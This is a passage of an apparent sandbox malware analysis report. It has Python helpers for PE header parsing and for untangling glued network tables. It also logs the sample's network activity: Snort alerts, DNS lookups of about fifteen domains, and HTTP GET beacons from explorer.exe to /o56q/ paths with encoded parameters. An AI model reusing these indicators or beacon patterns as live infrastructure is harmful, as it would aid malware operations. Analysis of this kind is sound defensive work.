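    nsec, _, _, _, opt_size = struct.unpack_from("<HIIIH", img, e_lfanew + 6)
    opt = e_lfanew + 24                                   # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", img, opt)[0] != 0x10B:
        raise ValueError("PE32 only")
    entry_rva, _, _, image_base = struct.unpack_from("<IIII", img, opt + 16)
    ndirs, = struct.unpack_from("<I", img, opt + 92)
    dirs = [struct.unpack_from("<II", img, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):                                 # section table follows the optional header
        name, vsize, rva, rsize, rptr = struct.unpack_from("<8sIIII", img, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode(), rva, vsize, rptr, rsize))
    return entry_rva, image_base, dirs, sections

def rva_to_off(sections, rva):
    for s in sections:
        if s.rva <= rva < s.rva + max(s.vsize, s.raw_size):
            return s.raw_ptr + rva - s.rva
    raise ValueError(f"RVA {rva:#x} is in no section")

def cstr(img, off):
    return img[off:img.index(b"\0", off)].decode()

def section_entropies(img):
    _, _, _, secs = parse_pe(img)
    return {s.name: entropy(img[s.raw_ptr:s.raw_ptr + s.raw_size]) for s in secs}

def dotnet_entry_stub(img):
    """'dll!func' when a managed image's entrypoint is FF 25 <VA of an IAT slot>, else None."""
    entry_rva, base, dirs, secs = parse_pe(img)
    if dirs[DIR_COM_DESCRIPTOR][1] == 0:
        return None                                       # no CLI header: not a .NET image
    eo = rva_to_off(secs, entry_rva)
    slot_rva = struct.unpack_from("<I", img, eo + 2)[0] - base
    iat_rva, iat_size = dirs[DIR_IAT]
    if img[eo:eo + 2] != b"\xff\x25" or not iat_rva <= slot_rva < iat_rva + iat_size:
        return None                                       # not `jmp dword ptr [IAT slot]`
    d = rva_to_off(secs, dirs[DIR_IMPORT][0])
    while True:                                           # walk the IMAGE_IMPORT_DESCRIPTOR list
        ilt, _, _, name_rva, first_thunk = struct.unpack_from("<IIIII", img, d)
        if first_thunk == 0:
            return None                                   # terminator: slot owned by no DLL
        idx, ilt_off = 0, rva_to_off(secs, ilt or first_thunk)
        while (thunk := struct.unpack_from("<I", img, ilt_off + 4 * idx)[0]):
            if first_thunk + 4 * idx == slot_rva and not thunk & 0x80000000:  # by-name import
                return f"{cstr(img, rva_to_off(secs, name_rva))}!{cstr(img, rva_to_off(secs, thunk) + 2)}"
            idx += 1
        d += 20

def build_sample_image(seed=1337):
    """Constructed PE32 (not NQQWym075C.exe) with the report's layout: IAT at RVA 0x2000,
    CLI header at 0x2008, one import, entry `jmp [00402000h]`, random .text filler."""
    base, text_rva, rng = 0x400000, 0x2000, random.Random(seed)
    text = bytearray(rng.getrandbits(8) for _ in range(0x1000))   # high-entropy body
    def put(rva, data):
        text[rva - text_rva:rva - text_rva + len(data)] = data
    put(0x2000, struct.pack("<II", 0x2090, 0))                    # IAT: one slot + terminator
    put(0x2008, struct.pack("<IHH", 0x48, 2, 5) + bytes(0x40))    # CLI header: cb, runtime 2.5
    put(0x2050, struct.pack("<IIIII", 0x2078, 0, 0, 0x2080, 0x2000) + bytes(20))  # import descriptor
    put(0x2078, struct.pack("<II", 0x2090, 0))                    # ILT mirrors the IAT
    put(0x2080, b"mscoree.dll\0")
    put(0x2090, struct.pack("<H", 0) + b"_CorExeMain\0")          # hint + name
    put(0x20A0, b"\xff\x25" + struct.pack("<I", base + 0x2000))   # jmp dword ptr [00402000h]
    dirs = [(0, 0)] * 16
    dirs[DIR_IMPORT], dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (0x2050, 0x28), (0x2000, 8), (0x2008, 0x48)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIII" + "HH" + "I" * 6,
                      0x10B, 8, 0, len(text), 0, 0, 0x20A0, text_rva, 0, base, 0x2000, 0x200,
                      4, 0, 0, 0, 4, 0, 0, 0x4000, 0x200, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    hdr = (b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)          # DOS header, e_lfanew = 0x40
           + b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102) + opt
           + struct.pack("<8sIIIIIIHHI", b".text", len(text), text_rva, len(text), 0x200, 0, 0, 0, 0, 0x60000020))
    return hdr + bytes(0x200 - len(hdr)) + bytes(text)
```

Calling `dotnet_entry_stub(build_sample_image())` returns "mscoree.dll!_CorExeMain" and `section_entropies(...)` reports a .text entropy above 7.5; on a real file read with `open(path, "rb").read()` the same two calls reproduce the report's numbers. A stub result of None on an image that does have a CLI header is the interesting case: then a native loader runs before the CLR and the entrypoint deserves a look.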

                                                                      Network Behavior

                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/20/20-20:13:59.024360 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49728 | 34.102.136.180 | 192.168.2.3
11/20/20-20:14:04.252129 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49730 | 34.102.136.180 | 192.168.2.3
11/20/20-20:14:09.492539 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49731 | 23.227.38.64 | 192.168.2.3
11/20/20-20:15:02.891478 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 35.186.238.101 | 192.168.2.3
11/20/20-20:15:13.160153 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49745 | 34.102.136.180 | 192.168.2.3
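
Exported sandbox tables like the Snort alerts above and the TCP packet list that follows often arrive with their columns glued together ("4972680192.168.2.3198.49.23.141"), and such a string has several valid readings (49726|80 or 4972|680; 192.168.2.3|198.49.23.141 or 192.168.2.31|98.49.23.141). The following is an added example, not code from Joe Sandbox: a parser that enumerates every valid split of a row and keeps the one consistent with the analysis host address, with a mirrored packet in the other direction, and failing that with a service port talking to an ephemeral port, then counts packets per server endpoint. It assumes the sandbox host is 192.168.2.3 (as the alert rows show) and uses the Windows dynamic port range start of 49152 as a heuristic; the sample rows are copied from this report in their glued form.

```python
import re
from collections import Counter
from itertools import product

# Added example, not part of the Joe Sandbox report. Resolves rows whose port and IP
# columns were run together into unambiguous (sport, dport, src, dst) tuples.
# Assumed: the sandbox host is 192.168.2.3; ephemeral client ports start at 49152.

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"          # 0-255, no leading zeros
IP_RE = re.compile(rf"{OCTET}(?:\.{OCTET}){{3}}")
ROW_RE = re.compile(r"^(?P<head>.*[^\d.])(?P<tail>[\d.]+)$")   # free text, then glued digits/dots
EPHEMERAL = 49152                                        # Windows dynamic port range start

def _is_port(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 65535

def two_way_splits(s, valid):
    """Every (left, right) cut of s where both halves satisfy valid()."""
    return [(s[:i], s[i:]) for i in range(1, len(s)) if valid(s[:i]) and valid(s[i:])]

def candidates(row):
    """All readings of one glued row as (head, sport, dport, src, dst)."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError("unrecognised row: " + row)
    tail = m["tail"]
    first_dot = tail.index(".")
    out = []
    for k in (1, 2, 3):                                  # digits in the first octet of the source IP
        if k > first_dot:
            break
        ports = two_way_splits(tail[:first_dot - k], _is_port)
        ips = two_way_splits(tail[first_dot - k:], IP_RE.fullmatch)
        out += [(m["head"], int(sp), int(dp), src, dst) for (sp, dp), (src, dst) in product(ports, ips)]
    return out

def parse_rows(rows, local_ips):
    """Resolve each glued row to exactly one (head, sport, dport, src, dst)."""
    per_row = [[c for c in candidates(r) if (c[3] in local_ips) != (c[4] in local_ips)]
               for r in rows]                            # exactly one endpoint is the sandbox host
    pool = {c[1:] for cs in per_row for c in cs}
    resolved = []
    for row, cs in zip(rows, per_row):
        if len(cs) > 1:                                  # prefer a reading mirrored by a reply packet
            cs = [c for c in cs if (c[2], c[1], c[4], c[3]) in pool] or cs
        if len(cs) > 1:                                  # then a service port paired with an ephemeral one
            cs = [c for c in cs if min(c[1], c[2]) < 1024 and max(c[1], c[2]) >= EPHEMERAL] or cs
        if len(cs) != 1:
            raise ValueError(f"{len(cs)} consistent readings for: {row.strip()}")
        resolved.append(cs[0])
    return resolved

def flows(parsed, local_ips):
    """Packets per (server ip, server port) as seen from the sandbox host."""
    counts = Counter()
    for _, sp, dp, src, dst in parsed:
        server, port = (dst, dp) if src in local_ips else (src, sp)
        counts[(server, port)] += 1
    return counts

# Constructed input: rows copied in their glued form from this report's tables.
SAMPLE_ROWS = [
    "Nov 20, 2020 20:13:47.553219080 CET4972680192.168.2.3198.49.23.141",
    "Nov 20, 2020 20:13:47.686038971 CET8049726198.49.23.141192.168.2.3",
    "Nov 20, 2020 20:13:47.686278105 CET4972680192.168.2.3198.49.23.141",
    "11/20/20-20:13:59.024360TCP1201ATTACK-RESPONSES 403 Forbidden804972834.102.136.180192.168.2.3",
    "11/20/20-20:14:09.492539TCP1201ATTACK-RESPONSES 403 Forbidden804973123.227.38.64192.168.2.3",
]
LOCAL = {"192.168.2.3"}

if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_ROWS, LOCAL)
    for head, sp, dp, src, dst in parsed:
        print(f"{head:<72} {src}:{sp} -> {dst}:{dp}")
    print(flows(parsed, LOCAL))
```

The mirror test is what makes the packet rows unambiguous: 49726|80 outbound is confirmed by 80|49726 inbound, while 4972|680 has no reply reading. Alert rows have no reply, so they fall through to the port-range heuristic; a row that still has several readings raises instead of silently picking one.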

                                                                      Network Port Distribution

                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 20:13:47.553219080 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.686038971 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.686278105 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.686299086 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.821281910 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824301004 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824321985 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824343920 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824366093 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824382067 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824397087 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824414968 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824433088 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.824434042 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824450016 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824465036 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.824498892 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.824779987 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957201004 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957236052 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957262039 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957285881 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957298994 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957326889 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957753897 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957788944 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957815886 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957834005 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957839966 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957864046 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957880020 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957886934 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957911968 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957928896 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.957936049 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957959890 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.957984924 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958003998 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.958013058 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958031893 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.958036900 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958061934 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958076000 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.958086014 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958110094 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958133936 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:47.958134890 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:47.958353043 CET | 49726 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:13:48.089970112 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:48.090013027 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:13:48.090038061 CET | 80 | 49726 | 198.49.23.141 | 192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090060949 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090070963 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090084076 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090110064 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090137005 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090148926 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090163946 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090183973 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090274096 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090281963 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090629101 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090656042 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090675116 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090678930 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090703964 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090722084 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090804100 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091305017 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091332912 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091353893 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091358900 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091388941 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091394901 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091415882 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091428995 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091442108 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091463089 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091469049 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091494083 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091494083 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091515064 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091521025 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091538906 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091546059 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091564894 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091573000 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091589928 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091600895 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091619968 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091628075 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091645002 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091653109 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091675043 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091676950 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091701031 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091701984 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091727018 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091727018 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091747999 CET4972680192.168.2.3198.49.23.141

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 20:13:47.504547119 CET | 192.168.2.3 | 8.8.8.8 | 0xaf73 | Standard query (0) | www.ussouthernhome.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:13:53.098772049 CET | 192.168.2.3 | 8.8.8.8 | 0x8532 | Standard query (0) | www.myreviewandbonuses.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:13:58.849778891 CET | 192.168.2.3 | 8.8.8.8 | 0x36cc | Standard query (0) | www.thrust-board.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:04.062829018 CET | 192.168.2.3 | 8.8.8.8 | 0x60c4 | Standard query (0) | www.teelinkz.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:09.270708084 CET | 192.168.2.3 | 8.8.8.8 | 0x4f87 | Standard query (0) | www.not-taboo.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:14.509269953 CET | 192.168.2.3 | 8.8.8.8 | 0x3991 | Standard query (0) | www.sz360buy.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:37.294660091 CET | 192.168.2.3 | 8.8.8.8 | 0xc30d | Standard query (0) | www.sz360buy.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:40.966525078 CET | 192.168.2.3 | 8.8.8.8 | 0x2ce0 | Standard query (0) | www.houseofhawthorn.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:46.445712090 CET | 192.168.2.3 | 8.8.8.8 | 0xda4a | Standard query (0) | www.bs600mc.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:51.807282925 CET | 192.168.2.3 | 8.8.8.8 | 0x7017 | Standard query (0) | www.tnicholson.design | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:57.175626993 CET | 192.168.2.3 | 8.8.8.8 | 0x3a9 | Standard query (0) | www.sabaicraft.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:02.698811054 CET | 192.168.2.3 | 8.8.8.8 | 0xe942 | Standard query (0) | www.deadroommn.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:07.898215055 CET | 192.168.2.3 | 8.8.8.8 | 0x5604 | Standard query (0) | www.biolineapparel.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:12.983716011 CET | 192.168.2.3 | 8.8.8.8 | 0xb034 | Standard query (0) | www.keitakora.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:18.165290117 CET | 192.168.2.3 | 8.8.8.8 | 0x54 | Standard query (0) | www.qzrpxx.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 20:13:47.546031952 CET | 8.8.8.8 | 192.168.2.3 | 0xaf73 | No error (0) | www.ussouthernhome.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:13:47.546031952 CET | 8.8.8.8 | 192.168.2.3 | 0xaf73 | No error (0) | ext-sq.squarespace.com | | 198.49.23.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:13:47.546031952 CET | 8.8.8.8 | 192.168.2.3 | 0xaf73 | No error (0) | ext-sq.squarespace.com | | 198.185.159.141 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:13:53.304198980 CET | 8.8.8.8 | 192.168.2.3 | 0x8532 | No error (0) | www.myreviewandbonuses.com | myreviewandbonuses.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:13:53.304198980 CET | 8.8.8.8 | 192.168.2.3 | 0x8532 | No error (0) | myreviewandbonuses.com | | 66.235.200.112 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:13:58.889568090 CET | 8.8.8.8 | 192.168.2.3 | 0x36cc | No error (0) | www.thrust-board.com | thrust-board.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:13:58.889568090 CET | 8.8.8.8 | 192.168.2.3 | 0x36cc | No error (0) | thrust-board.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:04.102109909 CET | 8.8.8.8 | 192.168.2.3 | 0x60c4 | No error (0) | www.teelinkz.com | teelinkz.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:14:04.102109909 CET | 8.8.8.8 | 192.168.2.3 | 0x60c4 | No error (0) | teelinkz.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:09.323026896 CET | 8.8.8.8 | 192.168.2.3 | 0x4f87 | No error (0) | www.not-taboo.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:14:09.323026896 CET | 8.8.8.8 | 192.168.2.3 | 0x4f87 | No error (0) | shops.myshopify.com | | 23.227.38.64 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:14.790863037 CET | 8.8.8.8 | 192.168.2.3 | 0x3991 | No error (0) | www.sz360buy.com | | 160.122.148.234 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:37.637876034 CET | 8.8.8.8 | 192.168.2.3 | 0xc30d | No error (0) | www.sz360buy.com | | 160.122.148.234 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:41.431552887 CET | 8.8.8.8 | 192.168.2.3 | 0x2ce0 | Server failure (2) | www.houseofhawthorn.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:51.938031912 CET | 8.8.8.8 | 192.168.2.3 | 0x7017 | No error (0) | www.tnicholson.design | | 65.254.250.119 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:14:57.373497009 CET | 8.8.8.8 | 192.168.2.3 | 0x3a9 | No error (0) | www.sabaicraft.com | | 192.64.147.164 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:02.756552935 CET | 8.8.8.8 | 192.168.2.3 | 0xe942 | No error (0) | www.deadroommn.com | | 35.186.238.101 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:07.962762117 CET | 8.8.8.8 | 192.168.2.3 | 0x5604 | Name error (3) | www.biolineapparel.com | none | none | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:13.024260044 CET | 8.8.8.8 | 192.168.2.3 | 0xb034 | No error (0) | www.keitakora.com | keitakora.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:15:13.024260044 CET | 8.8.8.8 | 192.168.2.3 | 0xb034 | No error (0) | keitakora.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:15:18.610785007 CET | 8.8.8.8 | 192.168.2.3 | 0x54 | No error (0) | www.qzrpxx.com | ls3xg13085cb982.dlszywz.com | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:15:18.610785007 CET | 8.8.8.8 | 192.168.2.3 | 0x54 | No error (0) | ls3xg13085cb982.dlszywz.com | | 47.91.170.148 | A (IP address) | IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.ussouthernhome.com
                                                                      • www.myreviewandbonuses.com
                                                                      • www.thrust-board.com
                                                                      • www.teelinkz.com
                                                                      • www.not-taboo.com
                                                                      • www.tnicholson.design
                                                                      • www.sabaicraft.com
                                                                      • www.deadroommn.com
                                                                      • www.keitakora.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49726 | 198.49.23.141 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:13:47.686299086 CET | 1055 | OUT | GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1
Host: www.ussouthernhome.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 20:13:47.824301004 CET | 1057 | IN | HTTP/1.1 400 Bad Request
content-length: 77564
expires: Thu, 01 Jan 1970 00:00:00 UTC
pragma: no-cache
cache-control: no-cache, must-revalidate
content-type: text/html; charset=UTF-8
connection: close
date: Fri, 20 Nov 2020 19:13:47 UTC
x-contextid: FLYzyLwI/wpkpTukT
server: Squarespace
                                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                      Session ID: 1, Source IP: 192.168.2.3, Source Port: 49727, Destination IP: 66.235.200.112, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:13:53.322623968 CET, kBytes transferred: 1138, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1
                                                                      Host: www.myreviewandbonuses.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session ID: 2, Source IP: 192.168.2.3, Source Port: 49728, Destination IP: 34.102.136.180, Destination Port: 80, Process: C:\Windows\explorer.exe
                                                                      Timestamp: Nov 20, 2020 20:13:58.907588005 CET, kBytes transferred: 1139, Direction: OUT
                                                                      Data:
                                                                      GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1
                                                                      Host: www.thrust-board.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Timestamp: Nov 20, 2020 20:13:59.024359941 CET, kBytes transferred: 1139, Direction: IN
                                                                      Data:
                                                                      HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Fri, 20 Nov 2020 19:13:58 GMT
